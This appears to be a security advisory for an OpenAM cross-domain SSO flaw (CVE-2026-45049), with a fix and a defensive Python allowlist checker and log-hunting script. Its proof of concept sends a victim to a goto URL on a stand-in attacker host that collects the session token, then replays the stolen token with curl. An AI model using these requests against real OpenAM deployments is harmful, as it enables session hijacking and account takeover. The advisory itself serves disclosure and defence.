high · 8.3 · CVE-2026-45049 · Jun 26, 2026

CVE-2026-45049: OpenAM CDCServlet Session Token Exfiltration via Unvalidated goto Redirect

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

OpenAM's cross-domain SSO servlet will POST a logged-in user's raw session token to any URL supplied in the goto parameter, letting an attacker steal the session by tricking the victim into visiting a

Package: org.openidentityplatform.openam:openam-federation
Ecosystem: maven
Affected: <= 16.0.6
Fixed in: 16.1.1

The problem

The CDCServlet in OpenAM's CDSSO component accepts a goto request parameter and uses it as the destination for a form POST that carries the user's raw iPlanetDirectoryPro session token.

The servlet performed no validation of that destination against a trusted-origins list, so an attacker-controlled URL was accepted as readily as a legitimate policy agent's. Any authenticated user who follows a crafted link therefore hands their live session credential to the attacker; nothing beyond the click is required, because the browser submits the returned form automatically.

Proof of concept

# 1. Attacker sends victim this link (e.g. via phishing)
GET https://openam.example.com/openam/cdcservlet?goto=https://attacker.example.com/collect HTTP/1.1
Host: openam.example.com
Cookie: iPlanetDirectoryPro=<victim-session-token>

# CDCServlet responds with an auto-submitting form that POSTs to the attacker URL.
# Attacker's server receives:
POST /collect HTTP/1.1
Host: attacker.example.com
Content-Type: application/x-www-form-urlencoded

Liberty=...&goto=https%3A%2F%2Fattacker.example.com%2Fcollect&...token=AQIC5wM2LY4Sfcx...

# 2. Attacker replays the token
curl -s https://openam.example.com/openam/identity/json/attributes \
  -H 'Cookie: iPlanetDirectoryPro=AQIC5wM2LY4Sfcx...'

CDCServlet generated an HTML auto-POST form targeting the raw goto URL without running it through OpenAM's existing RedirectUrlValidator (the Validation Service that already guards goto redirects on the normal auth path). The root cause is CWE-201: sensitive data (the session token) is included in data sent to a destination that was never verified to be trustworthy.

The 16.1.1 patch wires CDCServlet's goto destination through the same URL allowlist check used everywhere else in the codebase, so a goto pointing outside the configured valid-goto-resources list is now rejected before the POST is constructed. Public PoC not formally published; payload derived from advisory description and CDCServlet source behavior confirmed in multiple secondary analyses.

The fix

Upgrade to OpenAM Community Edition 16.1.1 or later. If upgrading is not immediately possible, disable CDSSO entirely, or put a reverse proxy or WAF rule in front of /openam/cdcservlet that rejects any request whose goto parameter does not point at a known policy agent. Note that egress controls on the OpenAM host do not help here: the POST carrying the token is made by the victim's browser, not by the server. After upgrading, configure the Validation Service (Access Control > realm > Services > Validation Service) with an explicit allowlist of trusted policy agent URLs so the new check has a concrete list to enforce against; an empty or overly broad allowlist leaves the patched check with nothing meaningful to reject.
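To make the boundary between the vulnerable and patched behaviour concrete, here is an added Python model of the goto allowlist check described above and of a retroactive hunt through access logs for requests that would have triggered the unpatched behaviour. It is example code written for this page, not OpenAM's own implementation (which is Java): the allowlist entry format is modelled on glob-style entries such as https://host:port/*, and the function names, the ALLOWED_GOTO constant and the SAMPLE_LOG lines are constructed for the example. It accepts only absolute http(s) URLs; relative gotos are not modelled.

```python
"""Model of the goto check CDCServlet lacked before 16.1.1 (illustration only).

This is an added example, not OpenAM's code. Allowlist entries are assumed to
look like "https://host:port/*"; the names, constants and log lines below are
constructed for this example. Only absolute http(s) URLs are accepted.
"""
import re
from fnmatch import fnmatchcase
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of trusted policy agent URLs (constructed for this example).
ALLOWED_GOTO = ["https://agent.example.com:443/*", "https://portal.example.com/*"]


def _canonical(url):
    """Return 'scheme://host:port/path' for an absolute http(s) URL, else None.

    Canonicalising both the goto and the allowlist entry defeats the usual
    redirect-allowlist bypasses: case games, default-port omission, userinfo
    ("https://agent.example.com@attacker.example.com"), scheme-relative "//host"
    and non-http schemes such as javascript:.
    """
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https") or not parts.hostname or "@" in parts.netloc:
        return None
    host = parts.hostname.lower().rstrip(".")
    port = port or (443 if scheme == "https" else 80)
    return f"{scheme}://{host}:{port}{parts.path or '/'}"


def is_trusted_goto(goto, allowlist=ALLOWED_GOTO):
    """True only if goto matches an allowlist entry after canonicalisation.

    '*' in an entry is a glob over the canonical string, so "https://h:443/*"
    admits any path on that host and port but nothing on another host, port
    or scheme (an http:// downgrade of an https:// entry is rejected).
    """
    target = _canonical(goto)
    if target is None:
        return False
    for entry in allowlist:
        pattern = _canonical(entry)
        if pattern is not None and fnmatchcase(target, pattern):
            return True
    return False


def cdc_form_action(goto, patched=True):
    """Destination of the auto-submitting form that carries the session token.

    patched=False models <= 16.0.6: the raw goto becomes the form action, so the
    token is posted wherever the link said. patched=True models the 16.1.1
    behaviour: an off-allowlist goto is refused (None) before any form is built.
    """
    if patched and not is_trusted_goto(goto):
        return None
    return goto


# Constructed access-log lines (Common Log Format) for the detection below.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2026:10:01:02 +0000] "GET /openam/cdcservlet?goto=https%3A%2F%2Fagent.example.com%2Fapp HTTP/1.1" 200 812',
    '10.0.0.9 - - [26/Jun/2026:10:03:44 +0000] "GET /openam/cdcservlet?goto=https%3A%2F%2Fattacker.example.com%2Fcollect HTTP/1.1" 200 819',
    '10.0.0.9 - - [26/Jun/2026:10:04:01 +0000] "GET /openam/XUI/ HTTP/1.1" 200 2300',
]

_CDC_REQUEST = re.compile(r'"GET (/openam/cdcservlet\S*)', re.IGNORECASE)


def find_cdc_exfil_attempts(lines, allowlist=ALLOWED_GOTO):
    """Return the goto values of cdcservlet requests that point off the allowlist.

    Useful for retroactive hunting on an unpatched deployment: every hit is a
    request that would have caused a live token to be posted to that URL.
    """
    hits = []
    for line in lines:
        match = _CDC_REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for goto in parse_qs(query).get("goto", []):
            if not is_trusted_goto(goto, allowlist):
                hits.append(goto)
    return hits


if __name__ == "__main__":
    evil = "https://attacker.example.com/collect"
    print("unpatched form action:", cdc_form_action(evil, patched=False))
    print("patched form action:  ", cdc_form_action(evil))
    print("suspicious gotos in log:", find_cdc_exfil_attempts(SAMPLE_LOG))
```

The check deliberately compares canonical strings rather than doing a substring or prefix test on the raw goto, which is where most "validated" redirects go wrong; the log hunt reuses the same predicate so that the detection and the prevention agree on what counts as trusted.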

Reporter not attributed.
